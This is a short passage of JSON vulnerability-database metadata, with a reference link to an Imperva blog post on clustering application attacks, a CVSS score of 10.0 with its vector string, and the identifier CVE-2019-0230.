"https://www.imperva.com/blog/2018/06/clustering-app-attacks-with-machine-learning-part-3-algorithm-results/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen":
CVE-2019-0230
